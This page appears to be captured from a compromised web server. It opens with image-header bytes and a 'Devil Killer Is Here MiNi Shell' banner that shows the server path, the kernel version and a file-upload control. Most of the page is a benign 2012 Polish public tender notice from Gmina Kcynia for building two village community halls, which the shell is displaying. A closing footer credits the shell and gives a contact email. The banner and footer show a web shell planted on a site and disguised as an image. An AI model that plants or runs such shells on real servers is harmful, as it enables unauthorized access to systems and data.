JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/5207-N-2012.html

<p class="kh_header"><b>Kcynia: 1.	Budowa świetlicy wiejskiej w miejscowości Rozpętek na terenie działki nr 14/2 w Gminie Kcynia.
2.	Budowa świetlicy wiejskiej w miejscowości Karmelita na terenie działki nr 423/31 w Gminie Kcynia.</b><br>
<b>Numer ogłoszenia: 5207 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kcynia , ul. Rynek 23, 89-240 Kcynia, woj. kujawsko-pomorskie, tel. 52 5893720 lub 21, faks 52 5893722.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.	Budowa świetlicy wiejskiej w miejscowości Rozpętek na terenie działki nr 14/2 w Gminie Kcynia.
2.	Budowa świetlicy wiejskiej w miejscowości Karmelita na terenie działki nr 423/31 w Gminie Kcynia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamawiający dopuszcza możliwość składania ofert częściowych.
2.	Opis przedmiotu zamówienia: 
Przedmiotem zamówienia jest:  
2.1.	Budowa świetlicy wiejskiej w miejscowości Rozpętek na terenie działki nr 14/2 w Gminie Kcynia.
2.2.	Budowa świetlicy wiejskiej w miejscowości Karmelita na terenie działki nr 423/31 w Gminie Kcynia.
3. Przedmiot zamówienia obejmuje:
Zakres robót obejmuje: 
3.1. Zadanie nr 1:
Budowa świetlicy wiejskiej w miejscowości Rozpętek na terenie działki nr 14/2 
w Gminie Kcynia.
Realizacja zadania obejmuje pełny zakres robót budowlanych i instalacyjnych, zgodnie 
z dokumentacją projektową w szczególności:  
1)	roboty budowlane,
a)	roboty ziemne,
b)	roboty przygotowawcze,
c)	roboty betonowe,
d)	roboty murarskie i tynkarskie i wyprawy wewnętrzne,
e)	wykonanie podłoży i posadzek,
f)	wykonanie dachu: konstrukcja i ocieplenie, pokrycie wraz z obróbka blacharską,
g)	roboty wykończeniowe,
h)	montaż okien i drzwi,
i)	wykonanie elewacji i elementów zewnętrznych,
j)	zagospodarowanie terenu: parking z placem manewrowym, utwardzony dojazd z dojściem do budynku,
k)	uporządkowanie terenu budowy,
2)	roboty wodociągowo-kanalizacyjne: wykonanie przyłącza wodociągowego, szczelnego zbiornika bezodpływowego na ścieki sanitarne, wewnętrznej instalacji kanalizacji i instalacji wodociągowej zimnej i ciepłej wody,
3)	wykonanie wewnętrznej instalacji grzewczej,
4)	wykonanie instalacji elektrycznej: roboty elektryczne - wewnętrzna instalacja elektryczna, budowa energetycznego przyłącza kablowego n n,
5)	budowa parkingów, dojazdów i dojść do budynku,
6)	roboty towarzyszące,
7)	obsługę geodezyjną - wytyczenie oraz powykonawczą inwentaryzację geodezyjną,
8)	 wykonanie audytu energetycznego budynku,
9)	 uzyskanie pozwolenia na użytkowanie,
10)	 przywrócenie nawierzchni po wykonaniu przyłączy do stanu pierwotnego w przypadku braku możliwości przywrócenia terenu budowy do stanu pierwotnego, Wykonawca ponosi koszty odszkodowania za wyrządzone szkody w stosunku do osób trzecich
3.2. Zadanie nr 2:
Budowa świetlicy wiejskiej w miejscowości Karmelita na terenie działki nr 423/31 
w Gminie Kcynia.
Realizacja zadania obejmuje pełny zakres robót budowlanych i instalacyjnych, zgodnie 
z dokumentacją projektową w szczególności:  
1)	roboty budowlane
a)  roboty ziemne,
b)  roboty przygotowawcze w tym rozbiórkowe - rozbiórka chodnika betonowego,
c)  roboty betonowe
d)  roboty murarskie i tynkarskie i wyprawy wewnętrzne,
e)  wykonanie podłoży i posadzek,
f)  wykonanie dachu: konstrukcja i ocieplenie, pokrycie wraz z obróbka blacharską,
g)  roboty wykończeniowe,
h)  montaż okien i drzwi,
i)  wykonanie podłóg i posadzek,
j)  wykonanie elewacji i elementów zewnętrznych,
k)  zagospodarowanie terenu: parking z placem manewrowym, utwardzony dojazd 
z dojściem do budynku,
l)  uporządkowanie terenu budowy,
2)	roboty wodociągowo-kanalizacyjne: wykonanie przyłącza wodociągowego, szczelny zbiornik bezodpływowy do ścieków sanitarnych, wewnętrznej instalacji kanalizacji i  instalacji wodociągowej zimnej i ciepłej wody,
3)	wykonanie wewnętrznej instalacji grzewczej,
4)	wykonanie instalacji elektrycznej,
5)	roboty elektryczne - wewnętrzna instalacja elektryczna,
6)	budowa energetycznego przyłącza kablowego n n,
7)	budowa parkingów, dojazdów i dojść do budynku,
8)	roboty towarzyszące.
9)	obsługę geodezyjną przed wykonawcza oraz powykonawczą inwentaryzację geodezyjną,
10)	 wykonanie audytu energetycznego budynku,
11)	uzyskanie pozwolenia na użytkowanie,
12)	 przywrócenie nawierzchni po wykonaniu przyłączy do stanu pierwotnego ( w przypadku braku możliwości przywrócenia terenu budowy do stanu pierwotnego, Wykonawca ponosi koszty odszkodowania za wyrządzone szkody w stosunku do osób trzecich)
4. Za całkowite zakończenie przedmiotu umowy,  uważa się uzyskanie pozwolenia na użytkowanie, zgodnie z obowiązującymi przepisami.
5. Szczegółowy zakres prac zawiera, projekt budowlany oraz specyfikacja techniczna wykonania i odbioru robót, stanowiące załącznik do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
6. Zamawiający dopuszcza stosowanie materiałów i urządzeń równoważnych - innych niż przewidziano w projekcie budowlanym, przedmiarach lub opisanych w specyfikacji technicznej wykonania i odbioru robót. Podane w/w dokumentach nazwy własne (pochodzenie, producent itp.) mają jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany w dokumentacji konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości określonego w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt.
7. Należy zachować cechy techniczne i jakościowe przedmiotu zamówienia z zachowaniem Polskich Norm przenoszących normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy, szczególne wymagania techniczne i jakościowe odnoszące się do przedmiotu zamówienia. 8. Wykonawca wykona i przygotuje (złoży) wszelkie dokumenty na wykonany przedmiot zamówienia, a zwłaszcza:
1)	dokumentacji powykonawczej,
2)	protokołu odbioru technicznego robót (częściowych i końcowego),
3)	aprobat technicznych,
4)	atestów i certyfikatów jakości, deklaracji zgodności z PN
5)  instrukcji ( w języku polskim) użytkowania zamontowanych urządzeń,
6)dokumentów gwarancyjnych wraz z warunkami gwarancji wszystkich
                zamontowanych urządzeń, w tym kartę gwarancyjną - załącznik nr 12,
7)  protokoły z badań materiałów i urządzeń,
8) inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia, 
                   a odnoszące się do jego realizacji, zwłaszcza rysunki ze zmianami naniesionymi w trakcie realizacji zadania.
9. Wykonawca zaopatrzy obiekt w oznaczenia i instrukcje wymagane obowiązującymi przepisami (np. p-poż., bhp).
10. Wykonawca przedstawi wartość zamówienia zgodnie z formularzem ofertowym, na podstawie załączonego kosztorysu ofertowego z podaniem ich składników tj.: 
	1) wartość 1 roboczo-godziny (netto w zł),
	2) koszty bezpośrednie od R i S w %,
	3) zysk w % liczony od sumy R M i S wraz z kosztami bezpośrednimi (od R i S), 
	4) stawka VAT w %
11. W przypadku wystąpienia jakichkolwiek zmian w zaplanowanych robotach dotyczących tego zamówienia Wykonawca sporządzi kosztorys różnicowy, po zakończeniu całości zadania sporządzony na podstawie określonych składników kosztorysu ofertowego i w formularzu ofertowym.
12. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
13. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
14. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości zamówienia podstawowego na podstawie art. 67 ust. 1 pkt 5,
15. Wartość zamówień dodatkowych należy obliczać od jego wartości określonej w umowie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający przewiduje wpłatę wadium:
    1)  dla zadania Nr 1 - Budowa świetlicy wiejskiej w miejscowości Rozpętek na terenie działki nr 14/2 w Gminie Kcynia: w wysokości 5.000,00 PLN (słownie: pięć tysięcy złotych 00/100),
    2)  dla zadania Nr 2 - Budowa świetlicy wiejskiej w miejscowości Karmelita na terenie działki nr 423/31 w Gminie Kcynia: w wysokości 5.000,00 PLN (słownie: pięć tysięcy złotych 00/100),
2. Wykonawca wnosi wadium:
- w pieniądzu, sposób przekazania: na konto zamawiającego 94 8166 0009 0000 0198 2000 0009 lub w jednej z poniżej podanych form:
1)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-rozliczeniowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2)	 w gwarancjach bankowych,
3)	w gwarancjach ubezpieczeniowych,
4)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt.  2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga posiadania specjalnych uprawnień na potrzeby wykonywania  przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie pięciu lat przed wszczęciem postępowania ,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  wraz z załączeniem dokumentów potwierdzających, że roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,  przynajmniej jedną robotą w zakresie  budowy rozbudowy lub przebudowy budynku użyteczności publicznej- załącznik nr 4 .
UWAGA! Pojęcie budynku użyteczności publicznej należy interpretować na podstawie Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r.  w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75 poz. 690 z późn. zm.)  
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował wiedzą i doświadczeniem innych podmiotów,  niezbędnymi do realizacji zamówienia,  w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania potencjałem technicznym do wykonania zamówienia - Zamawiający uzna, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału 
w postępowaniu o zamówienie publiczne - załącznik nr 2 do SIWZ.
Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie oceniony na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia - załącznik nr 5.
W wykazie należy wyszczególnić   osoby, które będą pełniły funkcje kierownika budowy w branży konstrukcyjno - budowlanej i kierowników robót  w branży sanitarnej i branży elektrycznej - po jednej osobie). 
Ponadto Wykonawca winien złożyć ,oświadczenie, że osoby, które będą uczestniczyć
 w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 7) - oświadczenie, że osoby posiadają uprawnienia niezbędne do wykonywania samodzielnych  funkcji technicznych  w budownictwie, określonych w ustawie z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2006r. Nr 156 poz. 1118 ze zm.) lub, że osoby posiadają kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. Nr 63 poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek ekonomiczny zapewniający wykonanie zadania, jeżeli Wykonawca przedstawi opłaconą polisę na ubezpieczenie od odpowiedzialności cywilnej, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia na kwotę minimum 200.000,00 zł ( słownie: dwieście tysięcy złotych 00/100 ) dla każdego zadania. 
Zamawiający uzna, że Wykonawca spełnia warunek finansowy zapewniający wykonanie zadania, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne - załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1, 
2 Wzór umowy - zaparafowany przez wykonawcę - załącznik nr 3 (3a dla zadania nr 1 i 3b dla zadania nr 2 wraz z zestawieniem rzeczowo-finansowym),
3 Wykaz prac, które wykonawca zamierza powierzyć podwykonawcom z podaniem ich wartości, złożony przez wykonawcę wg. wzoru stanowiącego załącznik nr 8 do SIWZ,
4. Karta gwarancyjna do wypełnienia i podpisania - załącznik nr 12 do SIWZ,
5. Dowód wniesienia wadium.
6. Oświadczenie o spełnianiu warunków w postępowaniu na podstawie art. 22 ust. 1 ustawy Pzp - załącznik nr 2,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kcynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kcyni
ul. Rynek 23, 89-240 Kcynia
pokój nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2012 godzina 10:00, miejsce: Urząd Miejski w Kcyni
ul. Rynek 23, 89-240 Kcynia
pokój nr 11 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania 413 Wdrażanie Lokalnych Strategii Rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com